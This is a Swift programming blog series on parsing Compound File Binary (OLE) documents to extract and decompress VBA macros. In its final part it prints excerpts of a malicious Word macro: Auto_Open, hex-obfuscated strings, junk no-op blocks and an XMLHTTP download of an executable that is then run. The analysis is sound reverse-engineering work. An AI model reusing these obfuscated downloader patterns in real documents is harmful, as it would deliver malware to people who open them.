Just An Application

November 23, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Eleven — The Grand Finale

Once we have a VBAModule we can get hold of the macro source like this.

    func getModuleSource(cf:CompoundFile, module:VBAModule) -> String?
    {
        let stream = cf.getStream(storage: ["Macros", "VBA"], name: module.streamName)
        let data   = stream?.data()
    
        if data == nil
        {
            return nil
        }
    
        let offset = Int(module.offset)
        let bytes  = data!.bytes
        let start  = bytes + offset
        let size   = Int(stream!.size) - offset
    
        let decompressor = VBADecompressor(bytes:start, nBytes:size)
    
        if let decompressed = decompressor.decompress()
        {
            return
                NSString(
                    bytes:
                        decompressed.bytes,
                    length:
                        decompressed.length,
                    encoding:
                        NSASCIIStringEncoding)
        }
        else
        {
            return nil
        }
    }

There is only one VBA module in this particular file.

It starts like this

    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Sub Auto_Open()

    ...

and ends with the canonical deobfuscation function.

    ...
    
    Public Function 'seekritFunction'(ByVal sData As String) As String
        Dim i       As Long
        For i = 1 To Len(sData) Step 2
        'seekritFunction' = 'seekritFunction' & Chr$(Val("&H" & Mid$(sData, i, 2)))
        Next i
    End Function

In between there is a lot of stuff like this

    ...
    
    GoTo lwaasqhrsst
    Dim gqtnmnpnrcr As String
    Open 'seekritFunction'("76627362776A7873756268") For Binary As #37555
    Put #37555, , gqtnmnpnrcr
    Close #37555
    lwaasqhrsst:
    Set kaakgrln = CreateObject('seekritFunction'("4D6963") + "ros" + "oft.XML" + "HTTP")

    GoTo gerkcnuiiuy
    Dim rqxnmbhnkoq As String
    Open 'seekritFunction'("757A76737169746D6D6370") For Binary As #29343
    Put #29343, , rqxnmbhnkoq
    Close #29343
    gerkcnuiiuy:
    claofpvn = Environ('seekritFunction'("54454D50"))

    GoTo vfvfbcuqpzg
    Dim vnklmvuptaq As String
    Open 'seekritFunction'("696F78686E716667726E6A") For Binary As #70201
    Put #70201, , vnklmvuptaq
    Close #70201
    vfvfbcuqpzg:
    kaakgrln.Open 'seekritFunction'("474554"), s8RX, False

    ...

which all looks very complicated until you realise that the first six lines of each block are a no-op.
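The hex strings are easy enough to decode outside of Word. What follows is a minimal sketch, written in current Swift syntax rather than the 2014 syntax used elsewhere in this post. The name decodeHex is made up for the illustration; it simply mirrors what the VBA function does with Chr$(Val("&H" & ...)).

```swift
// Hypothetical helper: turns a string of two-digit hex values into text,
// one character per pair of digits.
func decodeHex(_ hex: String) -> String? {
    let digits = Array(hex)

    // An odd number of digits cannot be split into pairs.
    guard digits.count % 2 == 0 else { return nil }

    var result = ""
    for i in stride(from: 0, to: digits.count, by: 2) {
        // Parse each pair of digits as a single byte.
        guard let value = UInt8(String(digits[i ... i + 1]), radix: 16) else {
            return nil
        }
        result.append(Character(UnicodeScalar(value)))
    }
    return result
}
```

Applied to the strings above, "54454D50" decodes to "TEMP", "474554" to "GET" and "4D6963" to "Mic", which is the start of the class name passed to CreateObject.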

There are approximately one hundred and fifty lines to start with, of which about half are ‘noise’.

What does it do ?

When the document is opened an executable (.exe) is downloaded from a hard-wired location and then run.

That’s it ? After all that ? ‘fraid so, a bit disappointing really isn’t it ? A spell-checker or something I expect. Very helpful of it really.

Still the Swift stuff was fun and the compound file stuff was ‘interesting’ !


Copyright (c) 2014 By Simon Lewis. All Rights Reserved.

Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.

Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Ten — Records, Records And More Records

The result of decompressing the contents of the dir stream object is almost as incomprehensible as the compressed data.

It consists of a large number of records of which we want a grand total of two per module.

The records we are interested in are preceded by a large number of records we are not interested in. Most of these records have a length field so it is possible to ‘skip’ them, but some of them do not, so there is nothing for it but to brute force our way through to the ones we want.
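As an illustration of the ‘skip’ case, here is a minimal sketch in current Swift syntax. It assumes the common record layout of a two byte little-endian id followed by a four byte little-endian size and then that many bytes of data. RecordReader and skipRecord are made-up names and are not the methods used in this series.

```swift
// Hypothetical reader over the decompressed bytes of the dir stream.
struct RecordReader {
    private let bytes: [UInt8]
    private(set) var position = 0

    init(bytes: [UInt8]) {
        self.bytes = bytes
    }

    // Reads byteCount bytes as a little-endian value and advances,
    // or returns nil without advancing if there are not enough bytes left.
    private mutating func readLittleEndian(byteCount: Int) -> UInt32? {
        guard position + byteCount <= bytes.count else { return nil }
        var value: UInt32 = 0
        for i in 0 ..< byteCount {
            value |= UInt32(bytes[position + i]) << UInt32(8 * i)
        }
        position += byteCount
        return value
    }

    // Skips one record with the expected id, assuming an id/size/data layout.
    // On failure the position may already have moved past the id.
    mutating func skipRecord(id expectedId: UInt16) -> Bool {
        guard let id = readLittleEndian(byteCount: 2), id == UInt32(expectedId),
              let size = readLittleEndian(byteCount: 4),
              Int(size) <= bytes.count - position else {
            return false
        }
        position += Int(size)
        return true
    }
}
```

Records without a usable length field cannot be handled this way, which is why a record-specific method is needed for each of them.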

The top-level method

    func parse() -> [VBAModule]?
    {
        informationRecord()
        projectReferences()
        return modules()
    }

is reasonably tidy, the others just consist of a lot of calls to a variety of methods for reading the different types of record, for example

    private func informationRecord()
    {
        readRecord(0x01)
        readRecord(0x02)
        readRecord(0x14)
        readRecord(0x03)
        readRecord(0x04)
        readRecordTwo(0x05)
        readRecordTwo(0x06)
        readRecord(0x07)
        readRecord(0x08)
        readRecordThree(0x09)
        readRecordTwo(0x0c)
    }

The end result should be an array containing one or more instances of VBAModule.

    struct VBAModule
    {
        let streamName  : String
        let offset      : UInt32
    }

A VBAModule is simply two pieces of information

  • the name of the stream object that contains the module’s compressed source, and

  • the offset within the stream object at which the compressed data starts.



Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Nine — Decompression Time

The compressed data in the dir stream object should comprise a signature byte, which is always one, followed by one or more ‘chunk’s each of which represents 4096 bytes of uncompressed data.

Compressed data should always be at the end of a stream object so the end of the compressed data is indicated by reaching the end of the stream object.

On that basis we can process the compressed data like this

    func decompress() -> ByteData?
    {
        if dataIn[0] != 1
        {
            return nil
        }
        dataInCurrent = 1
        while dataInCurrent < dataInEnd
        {
            if !chunk()
            {
                return nil
            }
        }
        return makeByteData()
    }

where dataIn is the compressed data to be processed.

A chunk comprises a two byte header followed by at least one ‘token sequence’.

A chunk header comprises

  • a twelve bit size

  • a three bit signature, and

  • a one bit flag

The size specifies the number of bytes in the chunk minus three.

The signature is always three (0x03).

The flag is one if the chunk contains compressed data, and zero otherwise.

We can process a chunk of compressed data like this

    private func chunk() -> Bool
    {
        let chunkInStart = dataInCurrent
        let header       = getUnsignedInt16()
    
        dataInCurrent += 2
    
        let size        = Int(header & 0x0FFF) + 3
        let signature   = (header >> 12) & 0x07
        let flag        = (header & 0x8000) != 0
    
        if signature != 3
        {
            return false
        }
    
        chunkOutStart = dataOutCurrent
    
        let chunkInEnd = min(chunkInStart + size, dataInEnd)
        
        if flag
        {
            while dataInCurrent < chunkInEnd
            {
                if !tokenSequence(chunkInEnd)
                {
                    return false
                }
            }
            return true
        }
        else
        {
            // uncompressed data not supported
            return false
        }
    }

A token sequence comprises a ‘flags byte’ followed by either

  • eight ‘token’s if it is not the last one in a chunk, or

  • between one and eight ‘token’s otherwise.

The i‘th bit in the flags byte specifies the type of the i‘th token.

If the bit is zero the token is a one byte ‘literal token’, otherwise it is a two byte ‘copy token’.

To obtain the uncompressed data represented by a token sequence we need to read the flags byte from the compressed data and then iterate over its bits, stopping early if we reach the end of the chunk.

In each iteration we need to handle either a literal or a copy token depending upon whether the bit is zero or one.

    func tokenSequence(chunkInEnd:Int) -> Bool
    {
        let flagsByte = Int(dataIn[dataInCurrent])
    
        dataInCurrent += 1
    
        if dataInCurrent < chunkInEnd
        {
            for i in 0 ..< 8
            {
                switch ((flagsByte >> i) & 1) == 1
                {
                    case false where (dataInCurrent + 1) <= chunkInEnd:
        
                        literalToken()
        
                    case true where (dataInCurrent + 2) <= chunkInEnd:
        
                        copyToken()
        
                    default:
        
                        return false
                }
                if dataInCurrent == chunkInEnd
                {
                    // end of chunk no more tokens
                    break
                }
            }
            return true
        }
        else
        {
            // must be at least one token
            return false
        }
    }

A literal token is a single byte of uncompressed data so we copy it from the compressed data to the decompressed data.

    private func literalToken()
    {
        // copy one byte straight through, then advance both cursors
        dataOut.append(dataIn[dataInCurrent])
        ++dataInCurrent
        ++dataOutCurrent
    }

A copy token is a little-endian 16 bit unsigned integer interpreted as two unsigned integers.

The unsigned integer in the low-order bits denotes a ‘length’ and the unsigned integer in the high-order bits denotes an ‘offset’.

The size of ‘offset’ can vary between a minimum of four bits and a maximum of twelve bits, with the size of ‘length’ correspondingly varying between a maximum of twelve bits and a minimum of four bits.

The size of ‘offset’ when a copy token is processed is a function of the amount of decompressed data in the current chunk at that point.

It is the smallest number of bits, nBits, that can be used to represent the amount of decompressed data minus one, or four if nBits is less than four.

To obtain the uncompressed data represented by a copy token we first need to compute the size of ‘offset’ and hence ‘length’ and extract the values.

Given an unsigned 32 bit integer i we can compute the smallest number of bits needed to represent it by counting the number of leading zeros.

This is a very brute force approach

    private func numberOfLeadingZeros(i: UInt32) -> UInt
    {
        var n    : UInt   = 0
        var mask : UInt32 = 0x80000000
    
        while (mask != 0) && ((i & mask) == 0)
        {
            mask >>= 1
            ++n
        }
        return n
    }

and this is a slightly less brute force approach.

    private func numberOfLeadingZerosAlt(var i: UInt32) -> UInt
    {
        var s : UInt = 0
    
        if (i & 0xFFFF0000) != 0
        {
            i >>= 16
            s = 16
        }
        if (i & 0xFF00) != 0
        {
            i >>= 8
            s += 8
        }
        if (i & 0xF0) != 0
        {
            i >>= 4
            s += 4
        }
        if (i & 0x0C) != 0
        {
            i >>= 2
            s += 2
        }
        if (i & 0x03) != 0
        {
            i >>= 1
            s += 1
        }
        if (i & 0x01) != 0
        {
            s += 1
        }
        return 32 - s
    }

The computed ‘offset’ + 1 gives the offset back from the end of the decompressed data at which to start copying.

The computed ‘length’ + 3 gives the amount of data to copy.

The data to copy is appended to the end of decompressed data.

    private func copyToken()
    {
        let copyToken = getUnsignedInt16()
    
        dataInCurrent += 2
    
        let chunkOutSize = dataOutCurrent - chunkOutStart
        let nBits        = max(32 - numberOfLeadingZerosAlt(UInt32(chunkOutSize - 1)), 4)
        let lengthMask   = 0xFFFF >> nBits
        let length       = (copyToken & lengthMask) + 3
        let offsetMask   = ~lengthMask
        let offset       = ((copyToken & offsetMask) >> (16 - nBits)) + 1
        let source       = dataOutCurrent - offset
        
        for i in 0 ..< length
        {
            // copy one byte at a time so that overlapping copies work
            dataOut.append(dataOut[source + i])
        }
        dataOutCurrent += length
    }

And that’s it.

We should now have the original data that was compressed and stored in the dir stream object.
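To see the pieces working together, here is a self-contained sketch of the whole process in current Swift syntax rather than the 2014 syntax used above. It is not the VBADecompressor class from this series. It is a single free function over a byte array, it uses the standard library's leadingZeroBitCount instead of the hand-written versions, and like the code above it rejects uncompressed chunks.

```swift
// Sketch of a decompressor for the container format described above.
// Only compressed chunks are supported.
func decompress(_ input: [UInt8]) -> [UInt8]? {
    // The container starts with a signature byte which must be one.
    guard let signature = input.first, signature == 1 else { return nil }

    var output = [UInt8]()
    var pos = 1

    while pos < input.count {
        // Two byte little-endian chunk header.
        guard pos + 2 <= input.count else { return nil }
        let header = UInt16(input[pos]) | (UInt16(input[pos + 1]) << 8)
        let chunkEnd = min(pos + Int(header & 0x0FFF) + 3, input.count)
        let isCompressed = (header & 0x8000) != 0
        guard (header >> 12) & 0x07 == 3, isCompressed else { return nil }
        pos += 2

        let chunkOutStart = output.count

        while pos < chunkEnd {
            // Each token sequence starts with a flags byte.
            let flags = input[pos]
            pos += 1
            guard pos < chunkEnd else { return nil }  // at least one token

            for bit in 0 ..< 8 where pos < chunkEnd {
                if (flags >> bit) & 1 == 0 {
                    // Literal token: one byte copied straight through.
                    output.append(input[pos])
                    pos += 1
                } else {
                    // Copy token: two bytes split into offset and length.
                    guard pos + 2 <= chunkEnd else { return nil }
                    let token = UInt16(input[pos]) | (UInt16(input[pos + 1]) << 8)
                    pos += 2

                    let produced = output.count - chunkOutStart
                    guard produced > 0 else { return nil }
                    let bitsNeeded = 32 - UInt32(produced - 1).leadingZeroBitCount
                    let nBits = min(max(bitsNeeded, 4), 12)
                    let lengthMask = UInt16(0xFFFF) >> nBits
                    let length = Int(token & lengthMask) + 3
                    let offset = Int((token & ~lengthMask) >> (16 - nBits)) + 1
                    guard offset <= produced else { return nil }

                    // Byte by byte so that overlapping copies work.
                    let source = output.count - offset
                    for i in 0 ..< length {
                        output.append(output[source + i])
                    }
                }
            }
        }
    }
    return output
}
```

A hand-built input makes a handy check. The nine bytes 01 05 B0 08 61 62 63 02 20 are a signature byte, a chunk header of 0xB005, a flags byte of 0x08, the three literals "abc" and a copy token of 0x2002. With three bytes already decompressed the offset is four bits wide, so the token means "go back three bytes and copy five", and the result is "abcabcab".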



November 22, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Eight — What Is It We Are Looking For Again ?

Using a CompoundFile instance we can create a Stream instance for any stream object in the file as long as we know what it is called.

If we continue to assume that whatever this particular compound file does is being done by macros, then we need to know where they are stored in a ‘word’ document.

To find this out we need to consult a second specification pithily entitled

    [MS-WORD]: Word (.doc) Binary File Format

According to section 2.1.9 Macros Storage

The Macros storage is an optional storage that contains the macros for the file. If present, it MUST be a Project Root Storage as defined in [MS-OVBA] section 2.2.1.

Curiously every other section which describes storage explicitly specifies the name, for example.

The Custom XML Data storage is an optional storage whose name MUST be “MsoDataStore”.

Section 2.1.9 is the only one that does not so we will have to assume for the moment that its name is going to be

    "Macros"

or something of that ilk.

Moving on to specification number three

    [MS-OVBA]: Office VBA File Format Structure

as referenced from section 2.1.9 quoted above, section 2.2.1 Project Root Storage starts

A single root storage. MUST contain VBA Storage (section 2.2.2) and PROJECT Stream (section 2.2.7).

Going further down the rabbit hole we find section 2.2.2 VBA Storage

A storage that specifies VBA project and module information. MUST have the name “VBA” (case- insensitive). MUST contain _VBA_PROJECT Stream (section 2.3.4.1) and dir Stream (section 2.3.4.2). MUST contain a Module Stream (section 2.2.5) for each module in the VBA project.

It’s not obvious from that where the actual code is, but a quick look at section 2.2.5 tells us.

A stream (1) that specifies the source code of modules in the VBA project. The name of this stream is specified by MODULESTREAMNAME (section 2.3.4.2.3.2.3). MUST contain data as specified by Module Stream (section 2.3.4.3).

So that’s where the source code is, but the name of the stream is elsewhere it appears.

In fact the name is in a MODULESTREAMNAME record which is in a MODULE record which is in a PROJECTMODULES record which is in the “dir” stream.

In the face of all that it’s tempting to just guess which stream it must be. There can’t be that many of them can there ?

Assuming we can find it, what’s in it ?

A module stream, it turns out, contains a variable length record followed by the compressed source code, so even if we guess which stream it is not going to do us much good.

The length of the first variable length record is defined in a MODULEOFFSET record which is also contained within a MODULE record and so on and so forth.

There is nothing for it, we are going to have to get hold of the “dir” stream.

We are looking for a stream named “dir” within a storage object which is definitely named “VBA” or “vba” or “VbA” or something like that, which is within a storage object which might be called “Macros”, maybe.

Trying

    let cff       = CompoundFileFactory()
    let cf        = cff.open(argv[1])
    let dirStream = cf?.getStream(storage: ["Macros", "VBA"], name: "dir")
    let data      = dirStream?.data()

results in a non-nil value for data so we are nearly there.



November 21, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Seven — Stream And Storage Objects

We can model the combination of a set of sectors and the associated file allocation table as a SectorSpace.

    protocol SectorSpace
    {
        func data(index:SectorIndex) -> ByteData?
    }

A SectorSpace is an object capable of returning the contents of a stream given the index of the first sector in that ‘space’.
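To make that concrete, here is a minimal in-memory sketch in current Swift syntax. It assumes the sectors and the file allocation table have already been read into arrays, and that the end of a chain is marked by the value 0xFFFFFFFE (ENDOFCHAIN in the specification). InMemorySectorSpace and chain(from:) are made-up names and not the types used in this series.

```swift
// Marks the last sector in a chain.
let endOfChain: UInt32 = 0xFFFFFFFE

// Hypothetical sector space: a set of equally sized sectors plus a table
// giving, for each sector, the index of the sector that follows it.
struct InMemorySectorSpace {
    let sectors: [[UInt8]]
    let fat: [UInt32]

    // Returns the concatenated contents of every sector in the chain that
    // starts at `start`, or nil if the chain is broken or loops.
    func chain(from start: UInt32) -> [UInt8]? {
        var result = [UInt8]()
        var index = start
        var visited = 0

        while index != endOfChain {
            guard index < UInt32(sectors.count),
                  index < UInt32(fat.count),
                  visited < fat.count else {
                return nil
            }
            result.append(contentsOf: sectors[Int(index)])
            index = fat[Int(index)]
            visited += 1
        }
        return result
    }
}
```

The chain always yields a whole number of sectors, so the caller still has to trim the result to the size of the stream, which is why a stream object needs both a starting sector and a size.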

There are two possible SectorSpaces in a compound file. The first represents the sectors in the file itself in combination with the FAT. The second represents the sectors in the mini stream in combination with the mini FAT.

We can implement the first straight away. We have a SectorSource for the sectors in the file and the FAT.

For the second we have the mini FAT but we do not have the sectors stored in the mini stream.

The mini stream is an internal stream stored in sectors in the file itself, so it can be constructed using the first SectorSpace which represents those sectors and the FAT.

To construct the mini stream we need to know the starting sector and the size. These are stored in the directory entry for the root storage object.

We can define them as properties in the class RootStorageEntry

    let miniStreamStart : SectorIndex
    let miniStreamSize  : StreamSize

We can make the mini stream sector space like this

    private func makeMiniStreamSpace(
                     rootStorageEntry:
                         RootStorageEntry,
                     miniFAT:
                         FileAllocationTable,
                     fileSpace:
                         SectorSpace) -> SectorSpace?
    {
        if let data = fileSpace.data(rootStorageEntry.miniStreamStart)
        {
            return
                MiniStreamSpace(
                    data:
                        data,
                    size:
                        rootStorageEntry.miniStreamSize,
                    fat:
                        miniFAT,
                    sectorSize:
                        CFBFFormat.MINI_SECTOR_SIZE)
        }
        else
        {
            return nil
        }
    }

Now we have our two sector spaces we can implement a stream factory that can create a stream object given the index of its first sector and its size.

The size below which a stream object is stored in the mini stream is defined by the miniStreamCutoffSize field in the header. This and the two sector spaces are all the stream factory needs.

    final class StreamFactory
    {
        init(fileSpace:SectorSpace, miniStreamSpace:SectorSpace, miniStreamCutoffSize:StreamSize)
        {
            self.fileSpace            = fileSpace
            self.miniStreamSpace      = miniStreamSpace
            self.miniStreamCutoffSize = miniStreamCutoffSize
        }
    
        //
    
        func makeStream(entry:StreamEntry) -> Stream?
        {
            let size = entry.streamSize
    
            // only streams strictly smaller than the cutoff live in the mini stream
            if size >= miniStreamCutoffSize
            {
                return Stream(size:size, start: entry.startingSector, space: fileSpace)
            }
            else
            {
                return Stream(size:size, start: entry.startingSector, space: miniStreamSpace)
            }
        }
    
        //
    
        private let fileSpace               : SectorSpace
        private let miniStreamSpace         : SectorSpace
        private let miniStreamCutoffSize    : StreamSize
    }

Once we have the stream factory we can define a class which implements a storage object.

All it needs is the StorageEntry which represents the storage object in the directory, so it can find the stream and storage objects it contains, and the stream factory, so that it can create stream objects as necessary.

    final class Storage
    {
        init(entry:StorageEntry, streamFactory:StreamFactory)
        {
            self.entry          = entry
            self.streamFactory  = streamFactory
            self.storageTable   = [String: Storage]()
            self.streamTable    = [String: Stream]()
        }
    
        //
    
        func getStream(var path:[String], name:String) -> Stream?
        {
            if path.count != 0
            {
                return getStorage(path.removeAtIndex(0))?.getStream(path, name: name)
            }
            else
            {
                return getStream(name)
            }
        }
    
        func getStorage(storageName:String) -> Storage?
        {
            var storage = storageTable[storageName]
    
            if storage != nil
            {
                return storage
            }
    
            let storageEntry = entry.getStorageEntry(storageName)
    
            if storageEntry == nil
            {
                return nil
            }
            storage = Storage(entry: storageEntry!, streamFactory: streamFactory)
            storageTable[storageName] = storage
            return storage
        }
    
        func getStream(streamName:String) -> Stream?
        {
            var stream = streamTable[streamName]
    
            if stream == nil
            {
                let streamEntry = entry.getStreamEntry(streamName)
    
                if streamEntry == nil
                {
                    return nil
                }
                stream = streamFactory.makeStream(streamEntry!)
                streamTable[streamName] = stream
            }
            return stream
        }
    
        //
    
        private let entry           : StorageEntry
        private let streamFactory   : StreamFactory
        //
        private var storageTable    : [String: Storage]
        private var streamTable     : [String: Stream]
    }

We can define a CompoundFile as a very simple wrapper around the Storage instance which represents the root storage object.

    final class CompoundFile
    {
        init(rootStorage:Storage)
        {
            self.rootStorage = rootStorage
        }
    
        //
    
        func getStream(#storage:[String], name:String) -> Stream?
        {
            return rootStorage.getStream(storage, name:name)
        }
    
        //
    
        private let rootStorage: Storage
    }


Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Six — Where Is Everything ? The Directory Edition

Now we have the file allocation table we can also read ‘the directory’.

The directory is an internal stream containing an entry for each storage object and stream object in the compound file.

The first entry in the directory is always the entry for the root storage object.

The entries for all the storage and stream objects contained within a given storage object are linked together as a red-black tree. The containing storage object has a link to the root of that tree.
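Finding a named object within a storage object is then an ordinary binary tree search starting from that link. The following is a minimal sketch in current Swift syntax, assuming that entries are compared first by name length and then by their upper-cased UTF-16 code units, and that 0xFFFFFFFF means ‘no entry’. Entry, compareNames and findChild are made-up names, and the upper-casing here only approximates the rule in the specification.

```swift
// Marks an absent left, right or child link.
let noStream: UInt32 = 0xFFFFFFFF

// Hypothetical, cut-down directory entry.
struct Entry {
    let name: String
    let left: UInt32
    let right: UInt32
    let child: UInt32
}

// Shorter names sort first; names of equal length are compared
// case-insensitively, code unit by code unit.
func compareNames(_ a: String, _ b: String) -> Int {
    let lengthA = a.utf16.count
    let lengthB = b.utf16.count
    if lengthA != lengthB { return lengthA < lengthB ? -1 : 1 }

    let upperA = Array(a.uppercased().utf16)
    let upperB = Array(b.uppercased().utf16)
    for (x, y) in zip(upperA, upperB) where x != y {
        return x < y ? -1 : 1
    }
    return 0
}

// Searches the tree of entries contained in the storage object at index
// `storage` and returns the index of the entry with the given name, if any.
func findChild(named name: String, of storage: Int, in entries: [Entry]) -> Int? {
    guard storage >= 0, storage < entries.count else { return nil }

    var current = entries[storage].child
    var steps = 0

    // The step count guards against loops in a damaged directory.
    while current != noStream, current < UInt32(entries.count), steps < entries.count {
        let entry = entries[Int(current)]
        let order = compareNames(name, entry.name)
        if order == 0 { return Int(current) }
        current = order < 0 ? entry.left : entry.right
        steps += 1
    }
    return nil
}
```

Note that the colour of an entry plays no part in a lookup. It only matters to something that has to keep the tree balanced when adding or removing entries.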

Each entry in the directory is represented by a DirectoryEntry which is 128 bytes long.

This means we can read the directory at the sector level rather than the stream level as there are guaranteed to be a whole number of entries per sector.

The firstDirSector header field identifies the first sector of the directory internal stream and the nDirSectors header field specifies the number of sectors.

In a version three compound file the nDirSectors field is always zero so it is of no use whatsoever. We have no choice but to iterate over all the sectors in sequence.

    private func readDirectoryV3(
                     header:
                         FileHeader,
                     fat:
                         FileAllocationTable,
                     sectors:
                         SectorSource) -> RootStorageEntry?
    {
        if let sequence = fat.sequence(header.firstDirSector)
        {
            let builder = DirectoryBuilder()
    
            for sectorIndex in sequence
            {
                let sector = sectors.sector(sectorIndex)
    
                if sector == nil
                {
                    return nil
                }
    
                var entryBytes = sector!
    
                for i in 0 ..< CFBFFormat.V3_DIRECTORY_ENTRIES_PER_SECTOR
                {
                    if !builder.addEntry(entryBytes)
                    {
                        return nil
                    }
                    entryBytes += CFBFFormat.DIRECTORY_ENTRY_SIZE
                }
            }
            return builder.build()
        }
        else
        {
            return nil
        }
    }

The DirectoryBuilder is passed a pointer to the bytes for each DirectoryEntry in each sector of the directory.

Within the DirectoryBuilder we can use the ‘flat struct’ technique to ‘read’ the DirectoryEntry.

In this case the struct FlatDirectoryEntry looks like this

    struct FlatDirectoryEntry
    {
        struct Name
        {
            let name0   : EightBytes
            let name1   : EightBytes
            let name2   : EightBytes
            let name3   : EightBytes
            let name4   : EightBytes
            let name5   : EightBytes
            let name6   : EightBytes
            let name7   : EightBytes
        }
    
        let name            : Name          // 64 bytes
        let nameLength      : UInt16
        let type            : UInt8
        let colour          : UInt8
        let left            : UInt32
        let right           : UInt32
        let child           : UInt32
        let clsid           : CLSID
        let state           : UInt32
        let created         : EightBytes
        let modified        : EightBytes
        let startingSector  : UInt32
        let streamSize      : UInt64
    }

The name field can contain up to thirty-two little-endian UTF-16 characters including a terminating ‘null’ character.

It is possible to define a struct with thirty-two UInt16 fields but it’s not going to be much use without some additional effort, so we settle for something that is the right length.

The nameLength field specifies the length of the name including the terminating ‘null’ character, in bytes for some reason.

The type field must be one of

  • 0x00 (Unknown/Unallocated)

  • 0x01 (Storage Object)

  • 0x02 (Stream Object)

  • 0x05 (Root Storage Object)

The colour field is the ‘colour’ of the entry in the red-black tree in which it appears.

The left and right fields give the indices of the left and right children of the entry, if any, in the red-black tree in which it appears.

The child field is only valid if the entry represents a storage object. It is the index of the entry at the root of the red-black tree of the entries for the storage objects and stream objects ‘contained’ within the storage object.

The startingSector and streamSize fields are only valid if the entry represents a stream object, in which case they specify the first sector of the stream object and its total size, or the root storage object, in which case they describe the mini stream.

We can ‘read’ the DirectoryEntry using the FlatDirectoryEntry struct like this.

    let flatEntry = UnsafePointer<FlatDirectoryEntry>(bytes).memory
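An alternative that does not rely on the compiler laying out the struct exactly as the bytes appear in the file is to read each field at an explicit offset. The sketch below is in current Swift syntax. The offsets are derived by adding up the field sizes listed above, and readLE, EntryOffset and entryName are made-up names.

```swift
// Reads a little-endian integer of type T starting at `offset`, or returns
// nil if that would run past the end of `bytes`.
func readLE<T: FixedWidthInteger>(_ type: T.Type, from bytes: [UInt8], at offset: Int) -> T? {
    let size = MemoryLayout<T>.size
    guard offset >= 0, offset + size <= bytes.count else { return nil }

    var value: T = 0
    for i in 0 ..< size {
        value |= T(truncatingIfNeeded: bytes[offset + i]) << (8 * i)
    }
    return value
}

// Byte offsets of some fields within a 128 byte directory entry.
enum EntryOffset {
    static let nameLength     = 64
    static let type           = 66
    static let startingSector = 116
    static let streamSize     = 120
}

// Decodes the little-endian UTF-16 name, dropping the terminating null.
func entryName(_ bytes: [UInt8]) -> String? {
    guard bytes.count >= 128,
          let nameLength = readLE(UInt16.self, from: bytes, at: EntryOffset.nameLength),
          nameLength % 2 == 0, nameLength <= 64 else {
        return nil
    }
    if nameLength == 0 { return "" }

    let units = stride(from: 0, to: Int(nameLength) - 2, by: 2).map {
        UInt16(bytes[$0]) | (UInt16(bytes[$0 + 1]) << 8)
    }
    return String(decoding: units, as: UTF16.self)
}
```

This is more typing than the flat struct but every read is bounds checked, and it behaves the same regardless of the byte order of the machine it runs on.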

We can represent the type of a DirectoryEntry using an enum with the appropriate raw values.

    enum ObjectType: UInt8
    {
        case Unknown     = 0
        case Storage     = 1
        case Stream      = 2
        case RootStorage = 5
    }

We can then attempt to construct one from the value of the type field to see whether it is valid.

    let type      = ObjectType(rawValue:flatEntry.type)
    
    if type == nil
    {
        return nil
    }

We can check that the nameLength field is an even number and that it is within bounds.

    let nameLength = Int(flatEntry.nameLength)
    
    if ((nameLength & 1) != 0) || nameLength > CFBFFormat.DIRECTORY_ENTRY_MAX_NAME_LENGTH
    {
        return nil
    }

The easiest way to construct the name itself is to use the pointer to the bytes while remembering that an Unknown/Unallocated entry has no name.

    var n : String?

    if nameLength != 0
    {
        n = NSString(bytes:bytes, length:Int(nameLength - 2), encoding: NSUTF16LittleEndianStringEncoding)
    }
    else
    {
        n = ""
    }
    if n == nil
    {
        return nil
    }

    let name = n!

Now we have both a type and a name we can engage in some gratuitous switchery to check that they are both valid.

    private func ensure(index:Int, name:String, type:ObjectType) -> Bool
    {
        switch type
        {
            case .Unknown where index != 0 && name == "":
    
                return true
    
            case .Storage, .Stream where index != 0 && name != "":
    
                return true
    
            case .RootStorage where index == 0 && name == CFBFFormat.DIRECTORY_ROOT_ENTRY_NAME:
    
                return true
    
            default:
    
                return false
        }
    }

If all the entries are read successfully we can then call the DirectoryBuilder build method.

If successful the build method returns a RootStorageEntry object. This can be used to find any storage object or stream object in the compound file.



November 18, 2014

Swift vs. The Compound File Binary File Format (aka OLE/COM): Part Five — Where Is Everything ? The Much Smaller Sectors Edition

The size of the sectors in a compound file is a function of the version. In a version three compound file the sector size is 512 bytes. In a version four compound file the sector size is 4096 bytes.

If a compound file contains a large number of stream objects that are smaller than a sector, and/or whose last part only partially fills a sector, then there can be a considerable amount of wasted space.

To help avoid this stream objects below a certain size may be stored as a series of much smaller 64 byte sectors instead.
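The saving is easy to put a number on. A small sketch in current Swift syntax, with allocatedBytes being a made-up helper and the 100 byte stream an arbitrary example:

```swift
// Bytes actually allocated for a stream of `size` bytes when space is
// handed out in whole sectors of `sectorSize` bytes.
func allocatedBytes(forStreamOfSize size: Int, sectorSize: Int) -> Int {
    let sectorCount = (size + sectorSize - 1) / sectorSize  // round up
    return sectorCount * sectorSize
}

let exampleSize = 100

// One 512 byte sector: 412 bytes wasted.
let wastedInSectors = allocatedBytes(forStreamOfSize: exampleSize, sectorSize: 512) - exampleSize

// Two 64 byte mini sectors: 28 bytes wasted.
let wastedInMiniSectors = allocatedBytes(forStreamOfSize: exampleSize, sectorSize: 64) - exampleSize
```

In a version four file, with its 4096 byte sectors, the same stream would waste 3996 bytes if it were stored in an ordinary sector.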

These sectors are in turn stored as the contents of an internal stream called the ‘mini stream’. This stream has an associated file allocation table, the ‘mini FAT’.

The mini FAT like the FAT is stored in sectors. Unlike the FAT the sector index chain for the Mini FAT is stored in the FAT.

Having read the FAT we can now read the mini FAT.

The starting sector and the number of sectors are specified by the

    firstMiniFATSector

and

    nMiniFATSectors

fields in the header.

We can read the mini FAT using readFAT since the structure of the mini FAT is identical to that of the FAT.

    private func readMiniFAT(
                     header:
                         FileHeader,
                     nEntriesPerSector:
                         Int,
                     fat:
                         FileAllocationTable,
                     sectors:
